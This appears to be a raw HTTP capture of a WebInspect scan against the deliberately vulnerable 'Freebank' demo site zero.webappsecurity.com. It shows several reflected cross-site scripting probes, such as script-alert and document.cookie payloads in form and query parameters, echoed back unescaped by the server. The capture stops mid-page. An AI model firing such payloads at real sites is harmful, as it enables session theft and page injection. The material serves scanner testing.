<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /_vti_bin/document.URL; HTTP/1.0
Referer: http://zero.webappsecurity.com:80/_vti_bin/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 401 Access Denied
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:44 GMT
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
Content-Length: 4431
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>You are not authorized to view this page</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->You are not authorized to view this page</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">You do not have permission to view this directory or page using the credentials you supplied.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Click the <a href="javascript:location.reload()">Refresh</a> button to try again with different credentials.</li>
<li>If you believe you should be able to view this directory or page, please contact the Web site administrator by using the e-mail address or phone number listed on the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page.</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 401.2 - Unauthorized: Logon failed due to server configuration<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Background:<br>
This is usually caused by a server-side script not sending the proper WWW-Authenticate header field. Using Active Server Pages scripting this is done by using the <strong>AddHeader</strong> method of the <strong>Response</strong> object to request that the client use a certain authentication method to access the resource.
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=401.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li>
</p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
GET /login1.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:17 GMT
X-Powered-By: ASP.NET
Location: banklogin.asp?err=Invalid Login:
Connection: Keep-Alive
Content-Length: 121
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /banklogin.asp?err=Invalid%20Login%3A%20333%2D333%2D3333test@test999.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:21 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4958
Content-Type: text/html
Cache-control: private
Set-Cookie: sessionid=; path=/
Set-Cookie: state=; path=/
Set-Cookie: username=; path=/
Set-Cookie: userid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER>Invalid Login: 333-333-3333test@test999.com<br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
POST /rootlogin.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 127
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=>"><script>alert("XSS")</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:38:08 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 108
Content-Type: text/html
Cache-control: private
<html>
<body>
Invalid Data >"><script>alert("XSS")</script><br>Please try again.
</body>
</html>
GET /forgot2.asp?msg2=no&msg=--><script>alert('XSS')</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:03 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 1846
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Forgotten Password</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>F O R G O T T E N P A S S W O R D</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<tr><td bgcolor=#c000ff><b><center>Forgotton Password</center></a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center">--><script>alert('XSS')</script></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#c000ff><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="login.asp">Login</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="join.asp">Join</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
</form>
</Table>
</table>
</body>
</html>
GET /linking/link1/link2/link3/link4/link5/link6/link7/index.htm HTTP/1.0
Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/link6/index.htm
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:24:23 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:10 GMT
ETag: "a0d8d7fda9dc11:8f6"
Content-Length: 37
<A HREF="./link8/index.htm">Link8</A>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=test@<script>alert(document.cookie)</script>.com&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:40 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4022
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:48 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 3994
Content-Type: text/html
Cache-control: private
Set-Cookie: passes=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes3=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please provide us with the following details</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /stats/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:26:04 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4269
Content-Type: text/html
Cache-control: private
<html>
<body topmargin=0 leftmargin=0 rightmargin=0 marginwidth=0 marginheight=0>
<table bgcolor="white" border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td bgcolor="#3399FF" align="right" height=10 valign="middle" width="100%" colspan="3">
</td>
</tr>
<tr>
<td align="center" width="30%">
</td>
<td valign="middle"><img height="70" width="150"src="http://form-engine.com/images/fade.gif"></td>
<td align="left" valign="middle" bgcolor="#cc0000" width="70%" valign="bottom">
<font face="Arial Black" color="#FFFFFF" size="6">Statistics </font>
</td>
</tr>
<tr height="1">
<td align="right" width="100%" height="10" bgcolor="#3399FF" colspan="3">
</td>
</tr>
</table>
<script language="Javascript">
<!--
function check()
{
if (document.login.email.value=="")
{
alert("Email Address is empty!");
return false;
}
if (document.login.password.value=="")
{
alert("Password is empty!");
return false;
}
}
//-->
</script>
<p><br></p>
<form method="POST" action="login1.asp" onsubmit="return check()" name="login">
<div align="center">
<center>
<table border="0" cellpadding="0" cellspacing="0" width="347" height="247">
<tr bgcolor="#000000">
<td valign="top" align="left" height="25" width="11"><img border="0" src="http://asiadepot.com/images/pink1.gif" width="9" height="9"></td>
<td valign="top" align="center" colspan="2" height="25" width="321">
<p align="center"><font color="#FFFFFF" face="Arial Black">Login</font></td>
<td valign="top" align="right" height="25" width="9"><img border="0" src="http://asiadepot.com/images/pink2.gif" width="9" height="9"></td>
</tr>
<tr>
<td colspan="4" bgcolor="#BDD6FF" align="center" height="30" width="343"><font face="arial, helvetica, sansserif" size="1">To log
on to the statistics page.<br>
Please type your name and password below.</font></td>
</tr>
<tr bgcolor="#BDD6FF">
<td height="25" width="11"> </td>
<td valign="middle" align="right" height="25" width="119">
<b>
<font face="arial,helvetica,sans-serif" size="1">Username: </font></b>
</td>
<td valign="top" align="left" height="25" width="200">
<input type="text" size="19" maxlength="32" value="" name="email"></td>
<td height="25" width="9"> </td>
</tr>
<tr bgcolor="#BDD6FF">
<td height="25" width="11"> </td>
<td valign="middle" align="right" height="25" width="119">
<font face="arial,helvetica,sans-serif" size="1"> <b> Password: </b>
</font>
</td>
<td valign="top" align="left" height="25" width="200">
<input type="password" size="19" maxlength="16" value="" name="password">
</td>
<td height="25" width="9"> </td>
</tr>
<tr bgcolor="#BDD6FF">
<td align="center" height="30" colspan="4" width="343"><input type="image" src="/images/log_me_blue_btn.gif" name="Login" width="96" height="26" border="0"></td>
</tr>
<tr bgcolor="#BDD6FF">
<td align="center" height="16" colspan="4" width="343"><font face="Tahoma, Arial, Helvetica, sans-serif" size="1">
</font></td>
</tr>
<tr bgcolor="#BDD6FF">
<td align="center" height="16" colspan="4" width="343"><font face="Tahoma, Arial, Helvetica, sans-serif" size="1">
</font></td>
</tr>
<tr bgcolor="#BDD6FF">
<td valign="bottom" align="left" height="21" width="11"><font size="1"><img border="0" src="http://asiadepot.com/images/pink3.gif" width="9" height="9"></font></td>
<td height="21" colspan="2" width="321"> </td>
<td valign="bottom" align="right" height="21" width="9"><font size="1"><img border="0" src="http://asiadepot.com/images/pink4.gif" width="9" height="9"></font></td>
</tr>
<input type=hidden name=gotopage value="">
</table>
</center>
</div>
</form>
<hr size=1><p align=center>
<FONT face="Arial, Geneva, Helvetica" size=2><a href="http://www.freebank.com">Copyright</a> 1999-2002
www.freebank.com. All rights reserved
<br><br>
Powered by <a href="http://frontsql.com">FrontSQL</a>
</font>
</p>GET /join.asp?name=--><script>alert('XSS')</script>&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:42 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
